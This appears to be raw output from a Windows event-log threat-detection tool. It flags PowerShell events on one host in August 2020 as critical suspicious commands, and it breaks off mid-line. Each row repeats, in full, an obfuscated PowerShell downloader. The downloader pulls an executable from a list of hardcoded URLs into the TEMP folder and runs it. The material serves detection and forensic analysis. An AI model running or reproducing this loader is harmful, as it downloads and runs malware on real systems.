$Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 789 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=27 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item" ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" ",DESKTOP-RIPCLIP,Windows PowerShell Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 787 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=23 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object" ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt" ",DESKTOP-RIPCLIP,Windows PowerShell Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 792 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 DetailTotal=1 SequenceNumber=33 UserId=DESKTOP-RIPCLIP\Clippy HostName=ConsoleHost HostVersion=5.1.19041.1 HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.19041.1 RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 PipelineId=6 ScriptName= CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item" ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" ",DESKTOP-RIPCLIP,Windows PowerShell Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," 800 0 4 8 0 0x80000000000000 786 Windows PowerShell DESKTOP-RIPCLIP $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp 